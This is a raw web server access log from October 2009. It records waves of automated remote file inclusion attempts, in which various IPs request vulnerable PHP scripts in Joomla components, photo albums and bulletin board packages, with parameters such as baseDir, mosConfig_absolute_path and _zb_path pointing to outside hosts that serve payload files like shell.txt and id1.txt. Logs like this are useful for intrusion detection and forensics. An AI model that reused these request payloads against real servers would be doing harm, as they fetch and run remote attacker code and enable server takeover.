200.135.218.37 - - [13/Oct/2009:04:34:42 -0400] "GET /logs/access_log.Q109071400/%031/dm-albums/template/album.php?SECURITY_FILE=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:34:53 -0400] "GET /%031/dm-albums/template/album.php?SECURITY_FILE=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:34:53 -0400] "GET /logs/%031/dm-albums/template/album.php?SECURITY_FILE=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:34:53 -0400] "GET /logs/access_log.Q109071400%20%20/%031/dm-albums/template/album.php?SECURITY_FILE=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:35:19 -0400] "GET /logs/access_log.Q109100500%20%20/%031/dm-albums/template/album.php?SECURITY_FILE=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:04:35:38 -0400] "GET /logs/access_log.Q109051800%20%20//appserv/errors.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:04:35:42 -0400] "GET /logs/access_log.Q109051800%20%20//appserv/errors.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:04:35:55 -0400] "GET /logs/access_log.Q109051800%20%20//appserv/errors.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
203.252.90.80 - - [13/Oct/2009:04:36:31 -0400] "GET /logs/access_log.Q109053100//skin/happycast_category_brown/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Oct/2009:04:36:32 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shell.malang.co.uk/shell.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
200.135.218.37 - - [13/Oct/2009:04:36:33 -0400] "GET /%031/dm-albums/template/album.php?SECURITY_FILE=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:36:33 -0400] "GET /logs/%031/dm-albums/template/album.php?SECURITY_FILE=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:36:33 -0400] "GET /logs/access_log.Q109071400/%031/dm-albums/template/album.php?SECURITY_FILE=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
213.236.203.20 - - [13/Oct/2009:04:36:52 -0400] "GET //?_zb_path=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
213.236.203.20 - - [13/Oct/2009:04:36:52 -0400] "GET /logs//?_zb_path=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 200 21657 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:36:53 -0400] "GET /logs/access_log.Q109100500/%031/dm-albums/template/album.php?SECURITY_FILE=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Oct/2009:04:37:13 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shell.malang.co.uk/shell.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
81.12.13.152 - - [13/Oct/2009:04:37:19 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
81.12.13.152 - - [13/Oct/2009:04:37:19 -0400] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
81.12.13.152 - - [13/Oct/2009:04:37:19 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Oct/2009:04:37:25 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shell.malang.co.uk/shell.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
81.12.13.152 - - [13/Oct/2009:04:37:27 -0400] "GET /logs/error_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Oct/2009:04:37:47 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shell.malang.co.uk/shell.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
222.236.47.182 - - [13/Oct/2009:04:37:48 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shell.malang.co.uk/shell.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
211.203.180.144 - - [13/Oct/2009:04:37:51 -0400] "GET /logs/access_log.Q109072500//bbs//skin/ggambo7002_board/write.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
213.236.203.20 - - [13/Oct/2009:04:38:01 -0400] "GET //?_zb_path=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
213.236.203.20 - - [13/Oct/2009:04:38:01 -0400] "GET /logs/access_log.Q109063000//?_zb_path=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
213.236.203.20 - - [13/Oct/2009:04:38:01 -0400] "GET /logs//?_zb_path=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 200 21657 "-" "Mozilla/5.0"
213.236.203.20 - - [13/Oct/2009:04:38:12 -0400] "GET /logs/access_log.Q109070200//?_zb_path=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
174.143.3.188 - - [13/Oct/2009:04:39:10 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
174.143.3.188 - - [13/Oct/2009:04:39:10 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
174.143.3.188 - - [13/Oct/2009:04:39:10 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
174.143.3.188 - - [13/Oct/2009:04:39:10 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Avant Browser (http://www.avantbrowser.com)"
121.187.75.28 - - [13/Oct/2009:04:39:15 -0400] "GET ///?_zb_path=http://oktober.fileave.com/read.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
121.187.75.28 - - [13/Oct/2009:04:39:15 -0400] "GET /logs/access_log.Q109081900///?_zb_path=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.187.75.28 - - [13/Oct/2009:04:39:15 -0400] "GET /logs///?_zb_path=http://oktober.fileave.com/read.txt? HTTP/1.1" 200 21658 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:04:39:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.249.173.242 - - [13/Oct/2009:04:40:04 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:40:04 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:40:17 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:40:32 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:41:08 -0400] "GET /logs//dm-albums/template/album.php?SECURITY_FILE=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:41:08 -0400] "GET /logs/access_log.Q109071400//dm-albums/template/album.php?SECURITY_FILE=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:41:08 -0400] "GET //dm-albums/template/album.php?SECURITY_FILE=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:41:24 -0400] "GET //dm-albums/template/album.php?SECURITY_FILE=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:41:28 -0400] "GET /logs//dm-albums/template/album.php?SECURITY_FILE=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:41:28 -0400] "GET /logs/access_log.Q109071400%20%20//dm-albums/template/album.php?SECURITY_FILE=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
213.236.203.20 - - [13/Oct/2009:04:41:32 -0400] "GET /logs/access_log.Q109063000%20%20//?_zb_path=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:41:33 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
207.210.84.226 - - [13/Oct/2009:04:41:47 -0400] "GET /logs/error_log.Q109061100%20//xmlrpc.php HTTP/1.1" 404 236 "-" "-"
207.210.84.226 - - [13/Oct/2009:04:41:48 -0400] "GET //xmlrpc.php HTTP/1.1" 404 209 "-" "-"
207.210.84.226 - - [13/Oct/2009:04:41:48 -0400] "GET /logs//xmlrpc.php HTTP/1.1" 404 214 "-" "-"
80.249.173.242 - - [13/Oct/2009:04:41:51 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:41:51 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:41:59 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:41:59 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:42:01 -0400] "GET /logs/access_log.Q109061100//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:42:06 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:42:06 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:42:11 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:42:19 -0400] "GET /logs/access_log.Q109061100//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:42:44 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:42:44 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:42:48 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:42:48 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
89.171.190.107 - - [13/Oct/2009:04:42:50 -0400] "GET /logs/access_log.Q109051400//appserv/errors.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:42:57 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:43:02 -0400] "GET //dm-albums/template/album.php?SECURITY_FILE=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:43:03 -0400] "GET /logs//dm-albums/template/album.php?SECURITY_FILE=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:43:03 -0400] "GET /logs/access_log.Q109071400//dm-albums/template/album.php?SECURITY_FILE=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:43:03 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
81.12.13.152 - - [13/Oct/2009:04:43:04 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
81.12.13.152 - - [13/Oct/2009:04:43:04 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
81.12.13.152 - - [13/Oct/2009:04:43:04 -0400] "GET /logs/access_log.Q109091600/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
81.12.13.152 - - [13/Oct/2009:04:43:09 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
81.12.13.152 - - [13/Oct/2009:04:43:10 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
81.12.13.152 - - [13/Oct/2009:04:43:10 -0400] "GET /logs/access_log.Q109083100//include/mail.inc.php?skin_board_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
81.12.13.152 - - [13/Oct/2009:04:43:13 -0400] "GET /logs/access_log.Q109091000//include/mail.inc.php?skin_board_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:43:14 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.199.140.158 - - [13/Oct/2009:04:43:30 -0400] "GET /logs/access_log.Q109051100///?_zb_path=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
122.199.140.158 - - [13/Oct/2009:04:43:30 -0400] "GET ///?_zb_path=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
122.199.140.158 - - [13/Oct/2009:04:43:30 -0400] "GET /logs///?_zb_path=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 200 21658 "-" "Mozilla/5.0"
81.12.13.152 - - [13/Oct/2009:04:43:45 -0400] "GET /logs/error_log.Q109072900/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:43:51 -0400] "GET /logs/access_log.Q109061100//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:04:43:52 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:04:43:52 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:04:43:52 -0400] "GET /logs/access_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:43:54 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:43:54 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:44:02 -0400] "GET /logs/access_log.Q109061100//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
69.13.180.28 - - [13/Oct/2009:04:44:08 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.0" 404 245 "-" "Mozilla/5.0"
69.13.180.28 - - [13/Oct/2009:04:44:09 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.0" 404 250 "-" "Mozilla/5.0"
69.13.180.28 - - [13/Oct/2009:04:44:09 -0400] "GET /logs/access_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.0" 404 272 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:04:44:13 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:04:44:13 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:04:44:13 -0400] "GET /logs/access_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:04:44:38 -0400] "GET /logs/access_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:04:44:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.150.183.219 - - [13/Oct/2009:04:44:48 -0400] "GET /logs/access_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
124.0.54.130 - - [13/Oct/2009:04:45:14 -0400] "GET //errors.php?error=http://djgono.nl/gallery/albums/1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:45:15 -0400] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
124.0.54.130 - - [13/Oct/2009:04:45:21 -0400] "GET /logs//errors.php?error=http://djgono.nl/gallery/albums/1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:45:51 -0400] "GET /logs/access_log.Q109061100//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
69.13.180.28 - - [13/Oct/2009:04:45:52 -0400] "GET /logs/access_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.0" 404 274 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:45:57 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:04:45:57 -0400] "GET //include/admin.lib.inc.php?site_path=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:04:45:58 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:04:45:58 -0400] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:46:08 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:04:46:27 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:04:46:27 -0400] "GET /logs/access_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:04:46:27 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:46:32 -0400] "GET /logs/access_log.Q109061100//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:04:46:34 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:04:46:34 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:04:46:34 -0400] "GET /logs/access_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:04:47:03 -0400] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:04:47:04 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:04:47:04 -0400] "GET //include/admin.lib.inc.php?site_path=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:47:10 -0400] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:47:10 -0400] "GET /logs/access_log.Q109062000/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:47:10 -0400] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:47:10 -0400] "GET /logs/access_log.Q109072300/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
